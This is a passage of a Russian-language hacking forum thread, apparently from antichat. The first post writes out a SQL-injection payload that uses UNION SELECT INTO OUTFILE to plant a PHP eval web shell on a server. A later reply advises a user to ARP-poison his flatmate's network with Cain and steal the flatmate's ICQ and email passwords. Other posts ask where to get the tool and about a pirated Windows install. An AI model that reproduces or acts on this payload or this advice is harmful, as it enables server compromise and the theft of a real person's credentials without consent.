дайте ссылы на статьи по поводу заливки шелла через запрос SQL, на подобе http://xxx/news.php?id=-1' UNION SELECT 1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6 INTO OUTFILE '1.php'; -- а то поиск не работает по идее ничего вообще не хочет искать заранее спасибо
привет всем!я снимаю хату с другом...у нас стоит инет, к нему мы подключены через хаб->к модему, а на модеме прописан РОУТЕР.... у него стоит винда виста, он скрыл свой комп при помощи настроек винды..и если его пустить на шару..то можно узнать только MAC адресс вопрос: не подскажите как мне его ламонуть...??
2 gangs бирешь ставишь сибу Cain .... сканируешь по arp.... делаешь arppoison атаку .... и пароли твоего "кореша на висте" от асек почты .... и другая лабудень у тибя в кармане!
где можно достать сибу Cain?? и можно не большой мануал к ней...что, как там сделать?? зарание спасибо!!
матрос в первом посте все написано. идешь в гугл в строке пишешь: запрос site:antichat.ru и гугл ищет по сайту
блин подскажите сволочь флеху чето заблокировало комп шалит влом винду переустанавливать все после обновления винды терь светит шо и винда у меня пиратская((((((((( достало можно их обратно откатать????